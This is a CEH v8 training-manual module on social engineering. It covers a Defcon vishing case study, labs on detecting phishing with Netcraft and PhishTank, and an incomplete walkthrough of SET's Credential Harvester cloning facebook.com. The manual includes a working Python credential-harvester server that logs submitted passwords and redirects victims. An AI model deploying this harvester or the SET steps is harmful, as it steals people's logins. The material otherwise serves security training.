
CEH v8 labs module 09 Social engineering


CEH Lab Manual

Social Engineering
Module 09


Module 09 - Social Engineering

Social Engineering
Social engineering is the art of convincing people to reveal confidential information.
Lab Scenario
Source: http://money.cnn.com/2012/08/07/technology/walmart-hack-defcon/index.htm

Social engineering is essentially the art of gaining access to buildings, systems, or data by exploiting human psychology, rather than by breaking in or using technical hacking techniques. The term "social engineering" can also mean an attempt to gain access to information, primarily through misrepresentation, and it often relies on the trusting nature of most individuals. For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.




Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving him information that could be used in a hacker attack to win a coveted "black badge" in the "social engineering" contest at the Defcon hackers' conference in Las Vegas.

In this year's Capture the Flag social engineering contest at Defcon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and his talent for self-effacing small talk to squeeze the following information out of Wal-Mart:


■ The small-town Canadian Wal-Mart store's janitorial contractor
■ Its cafeteria food-services provider
■ Its employee pay cycle
■ Its staff shift schedule
■ The time managers take their breaks
■ Where they usually go for lunch
■ Type of PC used by the manager
■ Make and version numbers of the computer's operating system, and
■ Its web browser and antivirus software

Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken in, to the extent of coughing up so much scam-worthy treasure.

Calling from his sound-proofed booth at Defcon, MacDougall placed an "urgent" call, broadcast to the entire Defcon audience, to a Wal-Mart store manager in Canada, introducing himself as "Gary Darnell" from Wal-Mart's home office in Bentonville, Ark.

CEH Lab Manual Page 675
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.



The role-playing visher (vishing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility of winning a multimillion-dollar government contract.

"Darnell" said that his job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations.

But first, he told the store manager, he needed a thorough picture of how the store operated.

In the conversation, which lasted about 10 minutes, "Darnell" described himself as a newly hired manager of government logistics.

He also spoke offhand about the contract: "All I know is Wal-Mart can make a ton of cash off it," he said, then went on to talk about his upcoming visit, keeping up a "steady patter" about the project and life in Bentonville, Cowley writes.

As if this wasn't bad enough, MacDougall/Darnell directed the manager to an external site to fill out a survey in preparation for his upcoming visit.

The compliant manager obliged, plugging the address into his browser.

When his computer blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT department and get the site unlocked.

After ending the call, stepping out of the booth and accepting his well-earned applause, MacDougall became the first Capture the Flag champion to capture every data point, or flag, on the competition checklist in the three years it has been held at Defcon. Defcon gives contestants two weeks to research their targets. Touchy information such as social security numbers and credit card numbers is verboten, given that Defcon has no great desire to bring the law down on its head.

Defcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the Defcon audience to have listened as MacDougall pulled down Wal-Mart's pants.

MacDougall said, "Companies are way more aware about their security. They've got firewalls, intrusion detection, log-in systems going into place, so it's a lot harder for a hacker to break in these days, or to at least break in undetected. So a bunch of hackers now are going to the weakest link, and the link that companies just aren't protecting, which is the people."

MacDougall also shared a few best practices to be followed to avoid falling victim to a social engineer:




■ Never be afraid to say no. If something feels wrong, something is wrong.
■ An IT department should never be calling asking about operating systems, machines, passwords or email systems; they already know.
■ Set up an internal company security word of the day and don't give any information to anyone who doesn't know it.
■ Keep tabs on what's on the web. Companies inadvertently release tons of information online, including through employees' social media sites.
As an expert ethical hacker and penetration tester, you should circulate the best practices to be followed among the employees.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Objectives
The objective of this lab is to:
■ Detect phishing sites
■ Protect the network from phishing attacks

To carry out this lab, you need:
■ A computer running Windows Server 2012
■ A web browser with Internet access

Lab Duration
Time: 20 Minutes
TASK 1: Overview

Overview of Social Engineering
Social engineering is the art of convincing people to reveal confidential information. Social engineers depend on the fact that people are aware of certain valuable information and are careless in protecting it.

Lab Tasks
Recommended labs to assist you in social engineering:
■ Social engineering
■ Detecting phishing using Netcraft
■ Detecting phishing using PhishTank

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.


Detecting Phishing Using Netcraft
Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

Lab Scenario
By now you are familiar with how social engineering is performed and what sort of information can be gathered by a social engineer.

Phishing is an example of a social engineering technique used to deceive users, and it exploits the poor usability of current web security technologies. Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one.

Phishers target the customers of banks and online payment services. They send messages to the bank's customers using manipulated URLs and website forgery. The messages claim to be from the bank and look legitimate; users, not realizing that the site is fake, provide their personal information and bank details. Not all phishing attacks require a fake website: messages that claim to be from a bank tell users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) is dialed, it prompts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.

Since you are an expert ethical hacker and penetration tester, you must be aware of phishing attacks occurring on the network and implement anti-phishing measures. In an organization, proper training must be provided to people to deal with phishing attacks. In this lab you will learn to detect phishing using Netcraft.


Lab Objectives
This lab will show you how to recognize phishing sites using a web browser and an anti-phishing toolbar. It will teach you how to:
■ Detect phishing sites
■ Protect the network from phishing attacks

To carry out this lab you need:
■ Netcraft is located at D:\CEH-Tools\CEHv8 Module 09 Social Engineering\Anti-Phishing Toolbar\Netcraft Toolbar
■ You can also download the latest version of Netcraft Toolbar from the link http://toolbar.netcraft.com/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet Explorer, etc.) with Internet access
■ Administrative privileges to run the Netcraft toolbar

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Duration
Time: 10 Minutes

Overview of Netcraft Toolbar
Netcraft provides Internet security services, including anti-fraud and anti-phishing services, application testing, code reviews, automated penetration testing, and research data and analysis on many aspects of the Internet. The Netcraft Toolbar is its browser add-on that exposes the anti-phishing service to the end user.

Lab Tasks

TASK 1: Anti-Phishing Toolbar

1. To start this lab, you need to launch a web browser first. In this lab we have used Mozilla Firefox.
2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.


Note: You can also download the Netcraft toolbar from http://toolbar.netcraft.com

FIGURE 1.1: Windows Server 2012-Start Menu

3. Click the Mozilla Firefox app to launch the browser.

FIGURE 1.2: Windows Server 2012-Start Menu Apps view

Note: Netcraft provides Internet security services, including anti-fraud and anti-phishing services.

4. To download the Netcraft Toolbar for Mozilla Firefox, enter http://toolbar.netcraft.com in the address bar of the browser or drag and drop the netcraft_toolbar-1.7-fx.xpi file into Firefox.
5. In this lab, we are downloading the toolbar from the Internet.
6. In the Firefox browser, click Download the Netcraft Toolbar to install it as an add-on.

FIGURE 1.3: Netcraft toolbar downloading page



7. On the Install page of the Netcraft Toolbar site, click the Firefox image to continue with installation.

Note: Netcraft is an Internet services company based in Bath, England.

FIGURE 1.4: Netcraft toolbar Installation Page


8. Click Allow to download Netcraft Toolbar.

FIGURE 1.5: Netcraft toolbar Installation-Allow button

9. When the Software Installation dialog box appears, click Install Now. The dialog reads: "Install add-ons only from authors whom you trust. Malicious software can damage your computer or violate your privacy. You have asked to install the following item: Netcraft Anti-Phishing Toolbar (Netcraft Ltd)".

Note: Netcraft Toolbar provides a wealth of information about the sites you visit.

FIGURE 1.6: Installing Netcraft Toolbar

10. To complete the installation, it will ask you to restart the browser. Click Restart Now.

Note: Risk Rating displays the trustworthiness of the current site.

FIGURE 1.7: Restarting Firefox browser


11. Netcraft Toolbar is now visible. Once the Toolbar is installed, it looks similar to the following figure.

FIGURE 1.8: Netcraft Toolbar on Mozilla Firefox web browser

12. When you visit a site, the following information displays in the Toolbar (unless the page has been blocked): Risk rating, Rank, and Flag.
13. Click Site Report to show the report of the site.

Note: Site Report links to a detailed report for the site.

FIGURE 1.9: Report generated by Netcraft Toolbar

14. If you attempt to visit a page that has been identified as a phishing page by Netcraft Toolbar, you will see a warning dialog that looks similar to the one in the following figure.
15. Type, as an example: http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin


Note: Phishing site feeds: a continuously updated encrypted database of patterns that match phishing URLs reported by the Netcraft Toolbar.

FIGURE 1.10: Warning dialog for blocked site

16. If you trust that page, click Yes to open it; if you don't, click No (Recommended) to block that page.
17. If you click No, the following page will be displayed.

FIGURE 1.11: Web page blocked by Netcraft Toolbar
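The URL in step 15 carries several warning signs a checker can score before any blocklist is consulted: the brand name "paypal" sits in the host while the registrable domain (secure7c.mx) belongs to someone else, the subdomain nesting is deep, and the page is plain HTTP. The script below is an added example, not Netcraft toolbar code or part of this manual; it scores a URL on those signals plus two others (a bare IP host, and userinfo before "@" that hides the real host). The brand list, the two-label suffix list and the weights are assumptions chosen for illustration; a production checker would use the full Public Suffix List and a reputation feed.

```python
"""Heuristic phishing-URL checks of the kind an anti-phishing toolbar
applies before consulting its blocklist. Added example; not Netcraft code.
Brand list, suffix list and weights are assumptions for illustration."""
import ipaddress
from urllib.parse import urlsplit

# Brands commonly impersonated, with the registrable domains they really use
# (assumed, illustrative list).
BRAND_DOMAINS = {
    "paypal": {"paypal.com"},
    "walmart": {"walmart.com", "walmart.ca"},
}

# Two-label suffixes treated as part of the registrable domain. A real
# checker would load the full Public Suffix List instead.
TWO_LABEL_SUFFIXES = {"co.uk", "com.mx", "com.au", "co.jp", "co.in"}

PHISHING_THRESHOLD = 3   # assumed cut-off for the "likely phishing" verdict


def registrable_domain(host: str) -> str:
    """Return the owner-controlled part of a hostname, e.g. secure7c.mx."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def is_ip_host(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyse_url(url: str) -> dict:
    """Score a URL; each reason carries a weight and the sum gives the verdict."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []

    if is_ip_host(host):
        reg = host
        reasons.append((3, "host is a bare IP address"))
    else:
        reg = registrable_domain(host)
        for brand, legit in BRAND_DOMAINS.items():
            # A brand name in the host means nothing unless the domain that
            # actually owns the name is one of the brand's own.
            if brand in host and reg not in legit:
                reasons.append((3, f"'{brand}' in host but registrable domain is {reg}"))
        if host.count(".") >= 4:
            reasons.append((1, "unusually deep subdomain nesting"))

    if parts.username is not None:
        # http://www.paypal.com@203.0.113.5/ : the browser connects to the IP.
        reasons.append((3, "userinfo before '@' hides the real host"))
    if parts.scheme.lower() != "https":
        reasons.append((1, "not served over HTTPS"))

    score = sum(weight for weight, _ in reasons)
    if score >= PHISHING_THRESHOLD:
        verdict = "likely phishing"
    elif score > 0:
        verdict = "needs review"
    else:
        verdict = "ok"
    return {"host": host, "registrable_domain": reg, "score": score,
            "verdict": verdict, "reasons": [text for _, text in reasons]}


if __name__ == "__main__":
    for sample in (
        "http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin",  # from step 15
        "https://www.paypal.com/signin",
        "https://www.paypal.com@203.0.113.5/",                    # constructed
    ):
        result = analyse_url(sample)
        print(f"{result['verdict']:16} {result['score']:2}  {sample}")
        for text in result["reasons"]:
            print("   -", text)
```

The step 15 URL scores 5 (brand mismatch, deep nesting, plain HTTP), the genuine PayPal sign-in page scores 0, and the userinfo trick scores 6 even though it uses HTTPS. Keep the HTTPS signal at a low weight: plenty of phishing kits now sit behind free certificates, so its absence is a hint, not proof.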

Lab Analysis
Document all the results and reports gathered during the lab.

Tool/Utility: Netcraft
Information Collected/Objectives Achieved: Phishing site detected

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Evaluate whether the Netcraft Toolbar works if you use a transparent proxy.
2. Determine if you can make the Netcraft Toolbar coexist on the same line as other toolbars. If so, how?
3. How can you stop the Toolbar warning if a site is trusted?

Internet Connection Required
☑ Yes ☐ No

Platform Supported
☑ Classroom ☐ iLabs


Detecting Phishing Using PhishTank
PhishTank is a collaborative clearinghouse for data and information regarding phishing on the Internet.

Lab Scenario
Phishing is an attempt by an individual or group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they have been sent from a legitimate organization or known individual. These emails often attempt to entice users to click on a link that will take the user to a fraudulent website that appears legitimate. The user then may be asked to provide personal information such as account user names and passwords that can further expose them to future compromises. Additionally, these fraudulent websites may contain malicious code.

With the tremendous increase in the use of online banking, online share trading, and e-commerce, there has been a corresponding growth in the incidents of phishing being used to carry out financial frauds. Phishing involves fraudulently acquiring sensitive information (e.g. passwords, credit card details, etc.) by masquerading as a trusted entity.

In the previous lab you have already seen how a phishing site can be detected using the Netcraft tool.

The usual scenario is that the victim receives an email that appears to have been sent from his bank. The email urges the victim to click on the link in the email. When the victim does so, he is taken to "a secure page on the bank's website." The victim believes the web page to be authentic and he enters his user name, password, and other information. In reality, the website is a fake and the victim's information is stolen and misused.

Being an administrator or penetration tester, you might implement all the most sophisticated and expensive technology solutions in the world; all of it can be bypassed if your employees fall for simple social engineering scams. It becomes your responsibility to educate employees on best practices for protecting information.

Phishing sites or emails can be reported to phishing-report@us-cert.gov (http://www.us-cert.gov/nav/report_phishing.html). US-CERT (United States Computer Emergency Readiness Team) collects phishing email messages and website locations so that it can help people avoid becoming victims of phishing scams.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Objectives
This lab will show you how to check suspected phishing sites using a web browser. It will teach you how to:
■ Detect phishing sites
■ Protect the network from phishing attacks

Lab Environment
To carry out the lab you need:
■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet Explorer, etc.) with Internet access

Lab Duration
Time: 10 Minutes

Overview of PhishTank
PhishTank URL: http://www.phishtank.com

PhishTank is a free community site where anyone can submit, verify, track, and share phishing data. PhishTank is a collaborative clearinghouse for data and information regarding phishing on the Internet. Also, PhishTank provides an open API for developers and researchers to integrate anti-phishing data into their applications at no charge.

Lab Tasks

TASK 1: PhishTank

1. To start this lab you need to launch a web browser first. In this lab we have used Mozilla Firefox.
2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 2.1: Windows Server 2012-Start Menu

3. Click the Mozilla Firefox app to launch the browser.

Note: PhishTank provides an open API for developers and researchers to integrate anti-phishing data into their applications at no charge.

FIGURE 2.2: Windows Server 2012-Start Menu Apps view

4. Type http://www.phishtank.com in the address bar of the web browser and press Enter.
5. You will see the PhishTank welcome screen ("Join the fight against phishing"), with options to submit suspected phishes, track the status of your submissions, verify other users' submissions, and develop software with the free API.

FIGURE 2.3: Welcome screen of PhishTank


Note: PhishTank is operated by OpenDNS to improve the Internet through safer, faster, and smarter DNS.

6. Type the website URL to be checked for phishing, for example, http://sdapld21.host21.com.
7. Click Is it a phish?.

FIGURE 2.4: Checking for site

If the site is a phishing site, you see the following warning dialog box, which shows the submission number and whether the phish is currently ONLINE.

Note: OpenDNS is interested in having the best available information about phishing websites.

FIGURE 2.5: Warning dialog for phishing site
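The "Is it a phish?" form answers one URL at a time; to protect a whole network you would pull PhishTank's feed of verified, online phishes (or call its API) and match against it in a proxy or mail gateway. The script below is an added example, not PhishTank's or OpenDNS's code. It loads a feed whose entries follow the shape of PhishTank's published JSON (phish_id, url, verified, online, target; the field names are assumptions recalled from that feed and should be confirmed against a real download), normalizes URLs before matching so that case, default ports and fragments do not cause misses, and keeps verified-online hits apart from unverified or offline entries, which bears directly on Questions 2 and 3 below. The feed contents are constructed for the example; the hostnames use the reserved .test domain.

```python
"""Match URLs against a PhishTank-style feed. Added example; not PhishTank
code. SAMPLE_FEED_JSON is constructed; field names follow PhishTank's
published JSON feed as recalled (confirm against a real download)."""
import json
from collections import defaultdict
from urllib.parse import urlsplit, urlunsplit

# Constructed stand-in for the downloadable feed; .test hosts are reserved.
SAMPLE_FEED_JSON = json.dumps([
    {"phish_id": 101, "url": "http://secure-login.example-bank.test/verify/index.php",
     "verified": "yes", "online": "yes", "target": "Example Bank"},
    {"phish_id": 102, "url": "https://update.example-pay.test/account",
     "verified": "no", "online": "yes", "target": "Other"},
    {"phish_id": 103, "url": "http://old-phish.example.test/",
     "verified": "yes", "online": "no", "target": "Other"},
])


def normalize(url: str) -> str:
    """Canonical form: lowercase scheme/host, default port dropped, empty
    path made '/', fragment removed. The query is kept because phishing
    kits often key the victim on it."""
    p = urlsplit(url.strip())
    scheme = p.scheme.lower()
    host = (p.hostname or "").lower()
    default_port = {"http": 80, "https": 443}.get(scheme)
    port = p.port
    netloc = host if port in (None, default_port) else f"{host}:{port}"
    return urlunsplit((scheme, netloc, p.path or "/", p.query, ""))


def load_feed(feed_json: str) -> dict:
    """Index the feed by exact normalized URL and by host."""
    by_url, by_host = {}, defaultdict(list)
    for entry in json.loads(feed_json):
        canon = normalize(entry["url"])
        by_url[canon] = entry
        by_host[urlsplit(canon).hostname].append(entry)
    return {"by_url": by_url, "by_host": by_host}


def lookup(url: str, index: dict) -> dict:
    """Classify a URL against the index.

    verified-online : block; this is what PhishTank lists as a confirmed live phish
    unverified      : submitted but not yet confirmed; warn, do not block on this alone
    offline         : was a phish, currently down
    same-host       : different path on a host that serves a confirmed phish
    not-listed      : absence from the feed is not a clean bill of health
    """
    canon = normalize(url)
    entry = index["by_url"].get(canon)
    if entry is not None:
        if entry.get("verified") != "yes":
            status = "unverified"
        elif entry.get("online") != "yes":
            status = "offline"
        else:
            status = "verified-online"
        return {"status": status, "entry": entry}

    host = urlsplit(canon).hostname
    for sibling in index["by_host"].get(host, []):
        if sibling.get("verified") == "yes":
            return {"status": "same-host", "entry": sibling}
    return {"status": "not-listed", "entry": None}


INDEX = load_feed(SAMPLE_FEED_JSON)


def check(url: str) -> dict:
    return lookup(url, INDEX)


if __name__ == "__main__":
    for candidate in (
        "HTTP://Secure-Login.Example-Bank.test:80/verify/index.php#top",
        "http://secure-login.example-bank.test/other.php",
        "https://update.example-pay.test/account",
        "https://www.example.com/",
    ):
        result = check(candidate)
        pid = result["entry"]["phish_id"] if result["entry"] else "-"
        print(f"{result['status']:16} phish_id={pid}  {candidate}")
```

Two points to carry into the lab questions: a feed entry that is submitted but not verified is evidence, not a verdict, so a gateway that blocks only on "verified-online" will let a brand-new phish through until the community confirms it (which is why a DNS resolver with its own intelligence may block a site PhishTank has not yet listed), and a URL that is not in the feed at all has simply not been reported, so "not-listed" must never be treated as "safe".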

Lab Analysis
Document all the websites and verify whether they are phishing sites.

Tool/Utility: PhishTank
Information Collected/Objectives Achieved: Phishing site detected

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Evaluate what PhishTank wants to hear about spam.
2. Does PhishTank protect you from phishing?
3. Why is OpenDNS blocking a phish site that PhishTank doesn't list or has not yet verified?

Internet Connection Required
☑ Yes ☐ No

Platform Supported
☑ Classroom ☐ iLabs


Social Engineering Penetration Testing Using Social Engineering Toolkit (SET)
The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering.

Lab Scenario
Social engineering is an ever-growing threat to organizations all over the world. Social engineering attacks are used to compromise companies every day. Even though there are many hacking tools available within underground hacking communities, a social engineering toolkit is a boon for attackers, as it is freely available to use to perform spear-phishing attacks, website attacks, etc. Attackers can draft email messages, attach malicious files, and send them to a large number of people using the spear-phishing attack method. Also, the multi-attack method allows utilization of the Java applet, Metasploit browser, Credential Harvester/Tabnabbing, etc. all at once.

Though numerous sorts of attacks can be performed using this toolkit, it is also a must-have tool for a penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and is supported heavily within the security community.

As an ethical hacker, penetration tester, or security administrator, you should be extremely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities on the network.

Lab Objectives
The objective of this lab is to help students learn to:
■ Clone a website
■ Obtain user names and passwords using the Credential Harvester method
■ Generate reports for conducted penetration tests


Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Environment
To carry out the lab, you need:
■ Run this tool in a BackTrack virtual machine
■ Web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 10 Minutes

Overview of Social Engineering Toolkit
The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering. SET is specifically designed to perform advanced attacks against the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization, used during a penetration test.
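The Credential Harvester method named in the objectives works by cloning a login page, serving the clone from the tester's machine, recording whatever the victim POSTs, and then redirecting the victim to the genuine site so the failed login looks like a mistyped password. The script below is an added illustration of that mechanism in plain Python; it is not SET's own code. REAL_SITE, the cloned form and the submitted credentials are placeholders, and the harvester is only for use against systems you are authorized to test. The POST-then-302-to-the-real-site pair is also the trace a defender should hunt for in proxy logs.

```python
"""What SET's Credential Harvester method does under the hood: serve a
cloned login form, log every POSTed field, then bounce the victim to the
genuine site. Added example for authorized lab use; not SET's own code.
REAL_SITE and CLONED_FORM are placeholders."""
import http.client
import threading
from http import HTTPStatus
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs

REAL_SITE = "https://login.example.test/"        # placeholder for the cloned site
SECRET_FIELDS = {"password", "passwd", "pass", "pin"}

# Stand-in for the HTML SET would fetch and clone from the real site (constructed).
CLONED_FORM = (b"<html><body><form method='post' action='/login'>"
               b"<input name='username'><input name='password' type='password'>"
               b"<button>Sign in</button></form></body></html>")

CAPTURED = []   # (client_ip, fields); what SET writes into its harvester report


def parse_form(body: bytes) -> dict:
    """Decode an application/x-www-form-urlencoded body, keeping empty values."""
    pairs = parse_qs(body.decode("utf-8", errors="replace"), keep_blank_values=True)
    return {name: values[0] for name, values in pairs.items()}


def has_credentials(fields: dict) -> bool:
    """True when at least one secret-looking field was actually filled in."""
    return any(name.lower() in SECRET_FIELDS and value for name, value in fields.items())


class HarvesterHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(HTTPStatus.OK)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(CLONED_FORM)))
        self.end_headers()
        self.wfile.write(CLONED_FORM)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = parse_form(self.rfile.read(length))
        CAPTURED.append((self.client_address[0], fields))
        # Redirect to the real site: the victim sees one "failed" login and
        # tries again there. That POST-then-302-elsewhere pair is also what
        # a defender should look for in proxy logs.
        self.send_response(HTTPStatus.FOUND)
        self.send_header("Location", REAL_SITE)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):   # keep the lab console quiet
        pass


def serve(port: int = 80):
    """Run the harvester in the foreground, as SET does, on the given port."""
    ThreadingHTTPServer(("0.0.0.0", port), HarvesterHandler).serve_forever()


def demo() -> dict:
    """Start the harvester on a loopback port, submit the form the way a
    victim's browser would, and return the response plus what was captured."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), HarvesterHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1], timeout=5)
        conn.request("POST", "/login", body=b"username=alice&password=s3cr%26t",
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        resp = conn.getresponse()
        result = {"status": resp.status, "location": resp.getheader("Location"),
                  "captured": list(CAPTURED)}
        conn.close()
    finally:
        server.shutdown()
        server.server_close()
    return result


if __name__ == "__main__":
    out = demo()
    print(out["status"], "->", out["location"])
    for ip, fields in out["captured"]:
        print(ip, fields, "credentials" if has_credentials(fields) else "no secret")
```

Run it as-is and demo() plays both sides on the loopback interface; serve() is the equivalent of leaving SET's harvester listening on port 80 during an engagement. Note that SET fetches the real page at clone time, so form field names, hidden tokens and the action URL all match the target; this example hard-codes a two-field form to keep the mechanism visible.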

Lab Tasks

TASK 1: Execute Social Engineering Toolkit

1. Log in to your BackTrack virtual machine.
2. Select Applications -> BackTrack -> Exploitation Tools -> Social Engineering Tools -> Social Engineering Toolkit and click set.

FIGURE 3.1: Launching SET in BackTrack


3. A Terminal window for SET will appear. Type y and press Enter to agree to the terms of service. The terms state that SET is provided as-is as a royalty-free open-source application, that using it for purposes not authorized by the company you are performing assessments for violates its terms of service and license, and that by answering yes (only one time) you agree to use the tool only for lawful purposes.

Note: SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon.

Note: The web jacking attack is performed by replacing the victim's browser with another window that is made to look and appear to be a legitimate site.

FIGURE 3.2: SET Service Agreement option

4. You will be presented with a list of menus to select the task. Type 1 and press Enter to select the Social-Engineering Attacks option. The main menu reads:

Welcome to the Social-Engineer Toolkit (SET). Your one stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com

Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

Note: SET allows you to specially craft email messages and send them to a large (or small) number of people with attached file-format malicious payloads.

FIGURE 3.3: SET Main menu

5. A list of menus in Social-Engineering Attacks will appear; type 2 and
press Enter to select Website Attack Vectors.

CEH Lab Manual Page 692

Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.



The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

    Join us on irc.freenode.net in channel #setoolkit
    The Social-Engineer Toolkit is a product of TrustedSec.

    Visit: https://www.trustedsec.com

    Select from the menu:

       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
       3) Infectious Media Generator
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) SMS Spoofing Attack Vector
       8) Wireless Access Point Attack Vector
       9) QRCode Generator Attack Vector
      10) Powershell Attack Vectors
      11) Third Party Modules

      99) Return back to the main menu.

FIGURE 3.4: Social Engineering Attacks menu

6. In the next set of menus that appears, type 3 and press Enter to select
the Credential Harvester Attack Method.
The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

    ... and the Back|Track team. This method utilizes iframe replacements to
    make the highlighted URL link to appear legitimate however when clicked
    a window pops up then is replaced with the malicious link. You can edit
    the link replacement settings in the set_config if its too slow/fast.

    The Multi-Attack method will add a combination of attacks through the web attack
    menu. For example you can utilize the Java Applet, Metasploit Browser,
    Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
    all at once to see which is successful.

       1) Java Applet Attack Method
       2) Metasploit Browser Exploit Method
       3) Credential Harvester Attack Method
       4) Tabnabbing Attack Method
       5) Man Left in the Middle Attack Method
       6) Web Jacking Attack Method
       7) Multi-Attack Web Method
       8) Victim Web Profiler
       9) Create or import a CodeSigning Certificate

      99) Return to Main Menu

    set:webattack>3

FIGURE 3.5: Website Attack Vectors menu

7. Now, type 2 and press Enter to select the Site Cloner option from the
menu.


The Site Cloner is used to clone a website of your choice.

       9) Create or import a CodeSigning Certificate

      99) Return to Main Menu

    set:webattack>3
    The first method will allow SET to import a list of pre-defined web
    applications that it can utilize within the attack.

    The second method will completely clone a website of your choosing
    and allow you to utilize the attack vectors within the completely
    same web application you were attempting to clone.

    The third method allows you to import your own website, note that you
    should only have an index.html when using the import website
    functionality.

       1) Web Templates
       2) Site Cloner
       3) Custom Import

      99) Return to Webattack Menu

    set:webattack>2

FIGURE 3.6: Credential Harvester Attack menu

8. Type the IP address of your BackTrack virtual PC in the prompt for IP
address for the POST back in Harvester/Tabnabbing and press Enter. In this
example, the IP is 10.0.0.15. The victim's browser will POST the form to this
address, so it must be reachable from the victim's network; as the SET prompt
says, use your external IP if the victim is outside your NAT.
The tabnabbing attack method is used when a victim has multiple tabs open. When the user clicks the link, the victim will be presented with a "Please wait while the page loads" message. When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are inserted, they are harvested and the user is redirected back to the original website.

    applications that it can utilize within the attack.

    The second method will completely clone a website of your choosing
    and allow you to utilize the attack vectors within the completely
    same web application you were attempting to clone.

    The third method allows you to import your own website, note that you
    should only have an index.html when using the import website
    functionality.

       1) Web Templates
       2) Site Cloner
       3) Custom Import

      99) Return to Webattack Menu

    set:webattack>2
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15

FIGURE 3.7: Providing IP address in Harvester/Tabnabbing

9. Now, you will be prompted for a URL to be cloned; type the desired URL at
Enter the url to clone and press Enter. In this example, we have used
www.facebook.com. This will initiate the cloning of the specified website.


The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.

    and allow you to utilize the attack vectors within the completely
    same web application you were attempting to clone.

    The third method allows you to import your own website, note that you
    should only have an index.html when using the import website
    functionality.

       1) Web Templates
       2) Site Cloner
       3) Custom Import

      99) Return to Webattack Menu

    set:webattack>2
